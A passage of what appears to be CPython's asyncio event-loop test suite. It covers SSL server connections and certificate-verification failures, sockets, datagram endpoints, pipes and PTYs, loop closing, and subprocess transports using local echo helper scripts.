def test_create_server_ssl(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_connection(MyBaseProto, host, port,
ssl=test_utils.dummy_ssl_context())
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.ONLYCERT, test_utils.ONLYKEY)
f_c = self.loop.create_unix_connection(
MyBaseProto, path, ssl=test_utils.dummy_ssl_context(),
server_hostname='')
client, pr = self.loop.run_until_complete(f_c)
client.write(b'xxx')
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
test_utils.run_until(self.loop, lambda: proto.nbytes > 0)
self.assertEqual(3, proto.nbytes)
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
        # the client socket must be closed afterwards to avoid ECONNRESET upon
        # recv()/send() on the serving socket
client.close()
# stop serving
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verify_failed(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# no CA loaded
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='invalid')
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(ssl.SSLError,
'(?i)certificate.verify.failed'):
self.loop.run_until_complete(f_c)
# execute the loop to log the connection error
test_utils.run_briefly(self.loop)
# close connection
self.assertIsNone(proto.transport)
server.close()
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_match_failed(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(
cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# incorrect server_hostname
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client)
with mock.patch.object(self.loop, 'call_exception_handler'):
with test_utils.disable_logger():
with self.assertRaisesRegex(
ssl.CertificateError,
"IP address mismatch, certificate is not valid for "
"'127.0.0.1'"):
self.loop.run_until_complete(f_c)
# close connection
# transport is None because TLS ALERT aborted the handshake
self.assertIsNone(proto.transport)
server.close()
@support.skip_unless_bind_unix_socket
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_unix_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, path = self._make_ssl_unix_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_unix_connection(MyProto, path,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
@unittest.skipIf(ssl is None, 'No ssl module')
def test_create_server_ssl_verified(self):
proto = MyProto(loop=self.loop)
server, host, port = self._make_ssl_server(
lambda: proto, test_utils.SIGNED_CERTFILE)
sslcontext_client = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
sslcontext_client.options |= ssl.OP_NO_SSLv2
sslcontext_client.verify_mode = ssl.CERT_REQUIRED
sslcontext_client.load_verify_locations(cafile=test_utils.SIGNING_CA)
if hasattr(sslcontext_client, 'check_hostname'):
sslcontext_client.check_hostname = True
# Connection succeeds with correct CA and server hostname.
f_c = self.loop.create_connection(MyProto, host, port,
ssl=sslcontext_client,
server_hostname='localhost')
client, pr = self.loop.run_until_complete(f_c)
# extra info is available
self.check_ssl_extra_info(client, peername=(host, port),
peercert=test_utils.PEERCERT)
# close connection
proto.transport.close()
client.close()
server.close()
self.loop.run_until_complete(proto.done)
def test_create_server_sock(self):
proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
proto.set_result(self)
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(TestMyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
self.assertEqual(sock.fileno(), sock_ob.fileno())
host, port = sock.getsockname()
self.assertEqual(host, '0.0.0.0')
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
def test_create_server_addr_in_use(self):
sock_ob = socket.create_server(('0.0.0.0', 0))
f = self.loop.create_server(MyProto, sock=sock_ob)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
f = self.loop.create_server(MyProto, host=host, port=port)
with self.assertRaises(OSError) as cm:
self.loop.run_until_complete(f)
self.assertEqual(cm.exception.errno, errno.EADDRINUSE)
server.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_server_dual_stack(self):
f_proto = self.loop.create_future()
class TestMyProto(MyProto):
def connection_made(self, transport):
super().connection_made(transport)
f_proto.set_result(self)
try_count = 0
while True:
try:
port = support.find_unused_port()
f = self.loop.create_server(TestMyProto, host=None, port=port)
server = self.loop.run_until_complete(f)
except OSError as ex:
if ex.errno == errno.EADDRINUSE:
try_count += 1
self.assertGreaterEqual(5, try_count)
continue
else:
raise
else:
break
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
f_proto = self.loop.create_future()
client = socket.socket(socket.AF_INET6)
client.connect(('::1', port))
client.send(b'xxx')
proto = self.loop.run_until_complete(f_proto)
proto.transport.close()
client.close()
server.close()
def test_server_close(self):
f = self.loop.create_server(MyProto, '0.0.0.0', 0)
server = self.loop.run_until_complete(f)
sock = server.sockets[0]
host, port = sock.getsockname()
client = socket.socket()
client.connect(('127.0.0.1', port))
client.send(b'xxx')
client.close()
server.close()
client = socket.socket()
self.assertRaises(
ConnectionRefusedError, client.connect, ('127.0.0.1', port))
client.close()
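    # Datagram endpoints: a UDP echo server is created first, then a client
    # endpoint is connected to it and the byte counts on both sides are
    # checked.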
def _test_create_datagram_endpoint(self, local_addr, family):
class TestMyDatagramProto(MyDatagramProto):
def __init__(inner_self):
super().__init__(loop=self.loop)
def datagram_received(self, data, addr):
super().datagram_received(data, addr)
self.transport.sendto(b'resp:'+data, addr)
coro = self.loop.create_datagram_endpoint(
TestMyDatagramProto, local_addr=local_addr, family=family)
s_transport, server = self.loop.run_until_complete(coro)
sockname = s_transport.get_extra_info('sockname')
host, port = socket.getnameinfo(
sockname, socket.NI_NUMERICHOST|socket.NI_NUMERICSERV)
self.assertIsInstance(s_transport, asyncio.Transport)
self.assertIsInstance(server, TestMyDatagramProto)
self.assertEqual('INITIALIZED', server.state)
self.assertIs(server.transport, s_transport)
coro = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop),
remote_addr=(host, port))
transport, client = self.loop.run_until_complete(coro)
self.assertIsInstance(transport, asyncio.Transport)
self.assertIsInstance(client, MyDatagramProto)
self.assertEqual('INITIALIZED', client.state)
self.assertIs(client.transport, transport)
transport.sendto(b'xxx')
test_utils.run_until(self.loop, lambda: server.nbytes)
self.assertEqual(3, server.nbytes)
test_utils.run_until(self.loop, lambda: client.nbytes)
# received
self.assertEqual(8, client.nbytes)
# extra info is available
self.assertIsNotNone(transport.get_extra_info('sockname'))
# close connection
transport.close()
self.loop.run_until_complete(client.done)
self.assertEqual('CLOSED', client.state)
server.transport.close()
def test_create_datagram_endpoint(self):
self._test_create_datagram_endpoint(('127.0.0.1', 0), socket.AF_INET)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 not supported or enabled')
def test_create_datagram_endpoint_ipv6(self):
self._test_create_datagram_endpoint(('::1', 0), socket.AF_INET6)
def test_create_datagram_endpoint_sock(self):
sock = None
local_address = ('127.0.0.1', 0)
infos = self.loop.run_until_complete(
self.loop.getaddrinfo(
*local_address, type=socket.SOCK_DGRAM))
for family, type, proto, cname, address in infos:
try:
sock = socket.socket(family=family, type=type, proto=proto)
sock.setblocking(False)
sock.bind(address)
            except OSError:
pass
else:
break
else:
            self.fail('Cannot create socket.')
f = self.loop.create_datagram_endpoint(
lambda: MyDatagramProto(loop=self.loop), sock=sock)
tr, pr = self.loop.run_until_complete(f)
self.assertIsInstance(tr, asyncio.Transport)
self.assertIsInstance(pr, MyDatagramProto)
tr.close()
self.loop.run_until_complete(pr.done)
def test_internal_fds(self):
loop = self.create_event_loop()
if not isinstance(loop, selector_events.BaseSelectorEventLoop):
loop.close()
self.skipTest('loop is not a BaseSelectorEventLoop')
self.assertEqual(1, loop._internal_fds)
loop.close()
self.assertEqual(0, loop._internal_fds)
self.assertIsNone(loop._csock)
self.assertIsNone(loop._ssock)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pipe(self):
proto = MyReadPipeProto(loop=self.loop)
rpipe, wpipe = os.pipe()
pipeobj = io.open(rpipe, 'rb', 1024)
async def connect():
t, p = await self.loop.connect_read_pipe(
lambda: proto, pipeobj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(wpipe, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 1)
self.assertEqual(1, proto.nbytes)
os.write(wpipe, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(wpipe)
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_unclosed_pipe_transport(self):
# This test reproduces the issue #314 on GitHub
loop = self.create_event_loop()
read_proto = MyReadPipeProto(loop=loop)
write_proto = MyWritePipeProto(loop=loop)
rpipe, wpipe = os.pipe()
rpipeobj = io.open(rpipe, 'rb', 1024)
wpipeobj = io.open(wpipe, 'w', 1024)
async def connect():
read_transport, _ = await loop.connect_read_pipe(
lambda: read_proto, rpipeobj)
write_transport, _ = await loop.connect_write_pipe(
lambda: write_proto, wpipeobj)
return read_transport, write_transport
# Run and close the loop without closing the transports
read_transport, write_transport = loop.run_until_complete(connect())
loop.close()
# These 'repr' calls used to raise an AttributeError
# See Issue #314 on GitHub
self.assertIn('open', repr(read_transport))
self.assertIn('open', repr(write_transport))
# Clean up (avoid ResourceWarning)
rpipeobj.close()
wpipeobj.close()
read_transport._pipe = None
write_transport._pipe = None
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_read_pty_output(self):
proto = MyReadPipeProto(loop=self.loop)
master, slave = os.openpty()
master_read_obj = io.open(master, 'rb', 0)
async def connect():
t, p = await self.loop.connect_read_pipe(lambda: proto,
master_read_obj)
self.assertIs(p, proto)
self.assertIs(t, proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(0, proto.nbytes)
self.loop.run_until_complete(connect())
os.write(slave, b'1')
test_utils.run_until(self.loop, lambda: proto.nbytes)
self.assertEqual(1, proto.nbytes)
os.write(slave, b'2345')
test_utils.run_until(self.loop, lambda: proto.nbytes >= 5)
self.assertEqual(['INITIAL', 'CONNECTED'], proto.state)
self.assertEqual(5, proto.nbytes)
os.close(slave)
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], proto.state)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe(self):
rpipe, wpipe = os.pipe()
pipeobj = io.open(wpipe, 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(rpipe, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(rpipe)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
def test_write_pipe_disconnect_on_close(self):
rsock, wsock = socket.socketpair()
rsock.setblocking(False)
pipeobj = io.open(wsock.detach(), 'wb', 1024)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, pipeobj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = self.loop.run_until_complete(self.loop.sock_recv(rsock, 1024))
self.assertEqual(b'1', data)
rsock.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_write_pty(self):
master, slave = os.openpty()
slave_write_obj = io.open(slave, 'wb', 0)
proto = MyWritePipeProto(loop=self.loop)
connect = self.loop.connect_write_pipe(lambda: proto, slave_write_obj)
transport, p = self.loop.run_until_complete(connect)
self.assertIs(p, proto)
self.assertIs(transport, proto.transport)
self.assertEqual('CONNECTED', proto.state)
transport.write(b'1')
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
test_utils.run_until(self.loop, lambda: reader(data) >= 1,
timeout=10)
self.assertEqual(b'1', data)
transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5,
timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual('CONNECTED', proto.state)
os.close(master)
# extra info is available
self.assertIsNotNone(proto.transport.get_extra_info('pipe'))
# close connection
proto.transport.close()
self.loop.run_until_complete(proto.done)
self.assertEqual('CLOSED', proto.state)
@unittest.skipUnless(sys.platform != 'win32',
"Don't support pipes for Windows")
# select, poll and kqueue don't support character devices (PTY) on Mac OS X
# older than 10.6 (Snow Leopard)
@support.requires_mac_ver(10, 6)
def test_bidirectional_pty(self):
master, read_slave = os.openpty()
write_slave = os.dup(read_slave)
tty.setraw(read_slave)
slave_read_obj = io.open(read_slave, 'rb', 0)
read_proto = MyReadPipeProto(loop=self.loop)
read_connect = self.loop.connect_read_pipe(lambda: read_proto,
slave_read_obj)
read_transport, p = self.loop.run_until_complete(read_connect)
self.assertIs(p, read_proto)
self.assertIs(read_transport, read_proto.transport)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(0, read_proto.nbytes)
slave_write_obj = io.open(write_slave, 'wb', 0)
write_proto = MyWritePipeProto(loop=self.loop)
write_connect = self.loop.connect_write_pipe(lambda: write_proto,
slave_write_obj)
write_transport, p = self.loop.run_until_complete(write_connect)
self.assertIs(p, write_proto)
self.assertIs(write_transport, write_proto.transport)
self.assertEqual('CONNECTED', write_proto.state)
data = bytearray()
def reader(data):
chunk = os.read(master, 1024)
data += chunk
return len(data)
write_transport.write(b'1')
test_utils.run_until(self.loop, lambda: reader(data) >= 1, timeout=10)
self.assertEqual(b'1', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'a')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 1,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(1, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
write_transport.write(b'2345')
test_utils.run_until(self.loop, lambda: reader(data) >= 5, timeout=10)
self.assertEqual(b'12345', data)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual('CONNECTED', write_proto.state)
os.write(master, b'bcde')
test_utils.run_until(self.loop, lambda: read_proto.nbytes >= 5,
timeout=10)
self.assertEqual(['INITIAL', 'CONNECTED'], read_proto.state)
self.assertEqual(5, read_proto.nbytes)
self.assertEqual('CONNECTED', write_proto.state)
os.close(master)
read_transport.close()
self.loop.run_until_complete(read_proto.done)
self.assertEqual(
['INITIAL', 'CONNECTED', 'EOF', 'CLOSED'], read_proto.state)
write_transport.close()
self.loop.run_until_complete(write_proto.done)
self.assertEqual('CLOSED', write_proto.state)
def test_prompt_cancellation(self):
r, w = socket.socketpair()
r.setblocking(False)
f = self.loop.create_task(self.loop.sock_recv(r, 1))
ov = getattr(f, 'ov', None)
if ov is not None:
self.assertTrue(ov.pending)
async def main():
try:
self.loop.call_soon(f.cancel)
await f
except asyncio.CancelledError:
res = 'cancelled'
else:
res = None
finally:
self.loop.stop()
return res
start = time.monotonic()
t = self.loop.create_task(main())
self.loop.run_forever()
elapsed = time.monotonic() - start
self.assertLess(elapsed, 0.1)
self.assertEqual(t.result(), 'cancelled')
self.assertRaises(asyncio.CancelledError, f.result)
if ov is not None:
self.assertFalse(ov.pending)
self.loop._stop_serving(r)
r.close()
w.close()
def test_timeout_rounding(self):
def _run_once():
self.loop._run_once_counter += 1
orig_run_once()
orig_run_once = self.loop._run_once
self.loop._run_once_counter = 0
self.loop._run_once = _run_once
async def wait():
loop = self.loop
await asyncio.sleep(1e-2)
await asyncio.sleep(1e-4)
await asyncio.sleep(1e-6)
await asyncio.sleep(1e-8)
await asyncio.sleep(1e-10)
self.loop.run_until_complete(wait())
        # The ideal number of calls is 12, but on some platforms the selector
        # may sleep a little bit less than the timeout, depending on the
        # resolution of the clock used by the kernel. Tolerate a few useless
        # calls on these platforms.
self.assertLessEqual(self.loop._run_once_counter, 20,
{'clock_resolution': self.loop._clock_resolution,
'selector': self.loop._selector.__class__.__name__})
def test_remove_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.add_reader(r, callback)
loop.add_writer(w, callback)
loop.close()
self.assertFalse(loop.remove_reader(r))
self.assertFalse(loop.remove_writer(w))
def test_add_fds_after_closing(self):
loop = self.create_event_loop()
callback = lambda: None
r, w = socket.socketpair()
self.addCleanup(r.close)
self.addCleanup(w.close)
loop.close()
with self.assertRaises(RuntimeError):
loop.add_reader(r, callback)
with self.assertRaises(RuntimeError):
loop.add_writer(w, callback)
def test_close_running_event_loop(self):
async def close_loop(loop):
self.loop.close()
coro = close_loop(self.loop)
with self.assertRaises(RuntimeError):
self.loop.run_until_complete(coro)
def test_close(self):
self.loop.close()
async def test():
pass
func = lambda: False
coro = test()
self.addCleanup(coro.close)
# operation blocked when the loop is closed
with self.assertRaises(RuntimeError):
self.loop.run_forever()
with self.assertRaises(RuntimeError):
fut = self.loop.create_future()
self.loop.run_until_complete(fut)
with self.assertRaises(RuntimeError):
self.loop.call_soon(func)
with self.assertRaises(RuntimeError):
self.loop.call_soon_threadsafe(func)
with self.assertRaises(RuntimeError):
self.loop.call_later(1.0, func)
with self.assertRaises(RuntimeError):
self.loop.call_at(self.loop.time() + .0, func)
with self.assertRaises(RuntimeError):
self.loop.create_task(coro)
with self.assertRaises(RuntimeError):
self.loop.add_signal_handler(signal.SIGTERM, func)
# run_in_executor test is tricky: the method is a coroutine,
# but run_until_complete cannot be called on closed loop.
# Thus iterate once explicitly.
with self.assertRaises(RuntimeError):
it = self.loop.run_in_executor(None, func).__await__()
next(it)
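# Subprocess tests: these drive subprocess_exec()/subprocess_shell() against
# the echo*.py helper scripts next to this file and check pipe transports,
# exit codes and signal handling.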
class SubprocessTestsMixin:
def check_terminated(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGTERM, returncode)
def check_killed(self, returncode):
if sys.platform == 'win32':
self.assertIsInstance(returncode, int)
# expect 1 but sometimes get 0
else:
self.assertEqual(-signal.SIGKILL, returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_exec(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
self.assertEqual(b'Python The Winner', proto.data[1])
@unittest.skipUnderUwsgi()
def test_subprocess_interactive(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
self.assertEqual('CONNECTED', proto.state)
stdin = transp.get_pipe_transport(0)
stdin.write(b'Python ')
self.loop.run_until_complete(proto.got_data[1].wait())
proto.got_data[1].clear()
self.assertEqual(b'Python ', proto.data[1])
stdin.write(b'The Winner')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'Python The Winner', proto.data[1])
with test_utils.disable_logger():
transp.close()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
def test_subprocess_shell(self):
with self.assertWarns(DeprecationWarning):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'echo Python')
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.get_pipe_transport(0).close()
self.loop.run_until_complete(proto.completed)
self.assertEqual(0, proto.returncode)
self.assertTrue(all(f.done() for f in proto.disconnects.values()))
self.assertEqual(proto.data[1].rstrip(b'\r\n'), b'Python')
self.assertEqual(proto.data[2], b'')
transp.close()
def test_subprocess_exitcode(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
transp.close()
def test_subprocess_close_after_finish(self):
connect = self.loop.subprocess_shell(
functools.partial(MySubprocessProtocol, self.loop),
'exit 7', stdin=None, stdout=None, stderr=None)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.assertIsNone(transp.get_pipe_transport(0))
self.assertIsNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
self.loop.run_until_complete(proto.completed)
self.assertEqual(7, proto.returncode)
self.assertIsNone(transp.close())
def test_subprocess_kill(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.kill()
self.loop.run_until_complete(proto.completed)
self.check_killed(proto.returncode)
transp.close()
def test_subprocess_terminate(self):
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.terminate()
self.loop.run_until_complete(proto.completed)
self.check_terminated(proto.returncode)
transp.close()
@unittest.skipIf(sys.platform == 'win32', "Don't have SIGHUP")
def test_subprocess_send_signal(self):
# bpo-31034: Make sure that we get the default signal handler (killing
# the process). The parent process may have decided to ignore SIGHUP,
# and signal handlers are inherited.
old_handler = signal.signal(signal.SIGHUP, signal.SIG_DFL)
try:
prog = os.path.join(os.path.dirname(__file__), 'echo.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
transp.send_signal(signal.SIGHUP)
self.loop.run_until_complete(proto.completed)
self.assertEqual(-signal.SIGHUP, proto.returncode)
transp.close()
finally:
signal.signal(signal.SIGHUP, old_handler)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
transp.close()
self.assertEqual(b'OUT:test', proto.data[1])
self.assertTrue(proto.data[2].startswith(b'ERR:test'), proto.data[2])
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_stderr_redirect_to_stdout(self):
prog = os.path.join(os.path.dirname(__file__), 'echo2.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog, stderr=subprocess.STDOUT)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
self.assertIsNotNone(transp.get_pipe_transport(1))
self.assertIsNone(transp.get_pipe_transport(2))
stdin.write(b'test')
self.loop.run_until_complete(proto.completed)
self.assertTrue(proto.data[1].startswith(b'OUT:testERR:test'),
proto.data[1])
self.assertEqual(b'', proto.data[2])
transp.close()
self.assertEqual(0, proto.returncode)
@unittest.skipUnderUwsgi()
def test_subprocess_close_client_stream(self):
prog = os.path.join(os.path.dirname(__file__), 'echo3.py')
connect = self.loop.subprocess_exec(
functools.partial(MySubprocessProtocol, self.loop),
sys.executable, prog)
with self.assertWarns(DeprecationWarning):
transp, proto = self.loop.run_until_complete(connect)
self.assertIsInstance(proto, MySubprocessProtocol)
self.loop.run_until_complete(proto.connected)
stdin = transp.get_pipe_transport(0)
stdout = transp.get_pipe_transport(1)
stdin.write(b'test')
self.loop.run_until_complete(proto.got_data[1].wait())
self.assertEqual(b'OUT:test', proto.data[1])
stdout.close()
self.loop.run_until_complete(proto.disconnects[1])
stdin.write(b'xxx')
self.loop.run_until_complete(proto.got_data[2].wait())
if sys.platform != 'win32':
self.assertEqual(b'ERR:BrokenPipeError', proto.data[2])
else:
